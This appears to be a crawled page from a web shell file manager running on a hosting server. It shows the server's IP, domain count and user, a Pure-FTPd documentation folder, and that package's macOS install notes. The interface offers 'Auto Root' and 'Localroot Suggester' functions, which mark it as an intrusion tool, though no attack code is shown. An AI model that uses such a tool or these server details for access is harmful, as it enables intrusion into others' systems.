Linux server1.hosting4iran.com 4.18.0-553.89.1.el8_10.x86_64 #1 SMP Mon Dec 8 03:53:08 EST 2025 x86_64
LiteSpeed
Server IP : 185.208.174.156 & Your IP : 216.73.216.218
Domains : 282 Domain
User : satitravel
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
pure-ftpd /
Delete
Unzip
Name
Size
Permission
Date
Action
FAQ
31.79
KB
-rw-r--r--
2025-06-06 14:14
README.Authentication-Modules
4.65
KB
-rw-r--r--
2025-06-06 14:14
README.Configuration-File
1.1
KB
-rw-r--r--
2025-06-06 14:14
README.LDAP
9.94
KB
-rw-r--r--
2025-06-06 14:14
README.MacOS-X
1004
B
-rw-r--r--
2025-06-06 14:14
README.MySQL
8.74
KB
-rw-r--r--
2025-06-06 14:14
README.PGSQL
8.1
KB
-rw-r--r--
2025-06-06 14:14
README.TLS
10.75
KB
-rw-r--r--
2025-06-06 14:14
README.Virtual-Users
11.68
KB
-rw-r--r--
2025-06-06 14:14
pure-ftpd.conf
11.33
KB
-rw-r--r--
2025-06-06 14:14
pureftpd-ldap.conf
1.96
KB
-rw-r--r--
2025-06-06 14:14
pureftpd-mysql.conf
3.28
KB
-rw-r--r--
2025-06-06 14:14
pureftpd-pgsql.conf
2.89
KB
-rw-r--r--
2025-06-06 14:14
pureftpd.schema
2.49
KB
-rw-r--r--
2025-06-06 14:14
Save
Rename
------------------------ OSX SPECIFIC NOTES ------------------------ The easiest way to install Pure-FTPd is to use Homebrew: $ brew install pure-ftpd Available options are: --with-mysql Build with mysql support --with-postgresql Build with postgresql support --with-virtualchroot Follow symbolic links even for chrooted accounts To get Pure-FTPd authenticate against system users on OSX, you have to use PAM. $ ./configure --with-pam <your other favorite options like --with-everything> $ make install-strip Create a /etc/pam.d/pure-ftpd file: # pure-ftpd: auth account password session auth required pam_opendirectory.so account required pam_permit.so password required pam_deny.so session required pam_permit.so Start the FTP server: $ /usr/local/sbin/pure-ftpd -lpam -B To take advantage of Bonjour, please add --with-bonjour to ./configure switches and give the server a Bonjour service name with the -v (--bonjour=) switch.